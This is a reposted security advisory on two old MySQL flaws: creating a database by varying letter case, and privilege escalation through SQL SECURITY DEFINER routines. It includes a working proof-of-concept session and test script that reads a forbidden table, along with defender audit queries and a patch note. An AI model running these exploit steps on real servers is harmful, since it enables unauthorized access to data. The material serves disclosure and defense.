This article describes the practical use of the MySQL privilege escalation and security restriction bypass vulnerabilities. I saw it on a related website a few days ago and thought it was good, so I am sharing it with you today.
Affected Systems:
MySQL AB MySQL <= 5.1.10
Description:
Bugtraq id: 19559
MySQL is a widely used open-source relational database system that runs on many platforms.
In MySQL, a user who has access to an existing database but lacks the CREATE privilege can still create a new database whose name differs from the existing one only in letter case (for example, sAmple beside sample). Successful exploitation requires that the file system hosting the MySQL data directory use case-sensitive file names, because each database name maps to a directory.
In addition, because the arguments of a SUID stored routine (one declared with SQL SECURITY DEFINER) are evaluated in the wrong security context, an attacker can execute arbitrary DML statements with the privileges of the routine's definer by passing his own routine as an argument. A successful attack requires only the EXECUTE privilege on the SUID routine.
Test method:
Warning: the following procedures may be offensive and are intended only for security research and teaching. Users act at their own risk.
1. Create a database

```
$ mysql -h my.mysql.server -u sample -p -A sample
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 263935 to server version: 4.1.16-standard

mysql> create database another;
ERROR 1044: Access denied for user 'sample'@'%' to database 'another'
mysql> create database sAmple;
Query OK, 1 row affected (0.00 sec)
```
2. Privilege escalation

The following is a mysqltest script (the `--error` lines are test directives that declare the error the next statement is expected to raise). The routine f_suid is created by the default (administrative) connection in the `test` database and is therefore a SQL SECURITY DEFINER routine by default.

```
--disable_warnings
drop database if exists mysqltest1;
drop database if exists mysqltest2;
drop function if exists f_suid;
--enable_warnings

# Prepare playground
create database mysqltest1;
create database mysqltest2;
create user malory@localhost;
grant all privileges on mysqltest1.* to malory@localhost;

# Create harmless (but SUID!) function
create function f_suid(i int) returns int return 0;
grant execute on function test.f_suid to malory@localhost;

use mysqltest2;
# Create table in which malory@localhost will be interested but to which
# he won't have any access
create table t1 (i int);

# Open a connection as malory (no password) with mysqltest1 as default database;
# the empty fourth argument is the password field of mysqltest's connect().
connect (malcon, localhost, malory, , mysqltest1);

# Correct: malory@localhost does not have access to mysqltest2.t1
--error ER_TABLEACCESS_DENIED_ERROR
select * from mysqltest2.t1;

# Create function which will allow to exploit security hole
delimiter |;
create function f_edevil ()
  returns int
  sql security invoker
begin
  set @a := current_user();
  set @b := (select count(*) from mysqltest2.t1);
  return 0;
end|
delimiter ;|

# Again correct: called directly, f_edevil() runs as malory and is denied
--error ER_TABLEACCESS_DENIED_ERROR
select f_edevil();
select @a, @b;

# Oops!!! It seems that f_edevil() is executed in the context of the
# f_suid() definer, so malory@localhost gets all the info that he wants
select test.f_suid(f_edevil());
select @a, @b;

connection default;
drop user malory@localhost;
drop database mysqltest1;
drop database mysqltest2;
```
Suggestion:
Vendor patch: MySQL AB has released an upgrade that fixes this security problem. Please download it from the vendor's homepage.
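As an added defender-side check (not part of the original advisory or of MySQL's own test suite), the following queries audit a server for the two preconditions described above: database names that collide on letter case, and SQL SECURITY DEFINER routines that accounts other than the definer are allowed to execute. It assumes an administrative account and MySQL 5.0 or later, so that information_schema and mysql.procs_priv exist.

```sql
-- Added audit queries; not from the original advisory or from MySQL's test suite.
-- Run as an administrative account (needs SELECT on mysql.procs_priv).

-- 1. Case-sensitivity issue. On a case-sensitive file system, names that differ
--    only in letter case are distinct databases and distinct privilege scopes.
--    lower_case_table_names=1 folds all names to lower case and removes the gap.
SHOW VARIABLES LIKE 'lower_case_table_names';

-- Databases that already collide on a case-folded comparison (e.g. sample / sAmple).
SELECT LOWER(SCHEMA_NAME)        AS folded_name,
       GROUP_CONCAT(SCHEMA_NAME) AS variants,
       COUNT(*)                  AS n
FROM   information_schema.SCHEMATA
GROUP  BY LOWER(SCHEMA_NAME)
HAVING COUNT(*) > 1;

-- 2. SUID routine issue. The preconditions are a SQL SECURITY DEFINER routine
--    and EXECUTE on it granted to an account other than the definer. List every
--    such routine with the non-definer grantees; in the test case above this
--    would report test.f_suid (definer root@localhost) with grantee malory@localhost.
SELECT r.ROUTINE_SCHEMA,
       r.ROUTINE_NAME,
       r.ROUTINE_TYPE,
       r.DEFINER,
       CONCAT(p.User, '@', p.Host) AS grantee
FROM   information_schema.ROUTINES r
JOIN   mysql.procs_priv p
       ON  p.Db           = r.ROUTINE_SCHEMA
       AND p.Routine_name = r.ROUTINE_NAME
       AND p.Routine_type = r.ROUTINE_TYPE
WHERE  r.SECURITY_TYPE = 'DEFINER'
  AND  FIND_IN_SET('Execute', p.Proc_priv) > 0   -- Proc_priv is a SET column
  AND  CONCAT(p.User, '@', p.Host) <> r.DEFINER
ORDER  BY r.ROUTINE_SCHEMA, r.ROUTINE_NAME;
```

Routines returned by the second query should have their bodies reviewed and, where the definer's privileges are not actually needed, be redefined with SQL SECURITY INVOKER; existing database and table names must be converted to lower case before lower_case_table_names is changed.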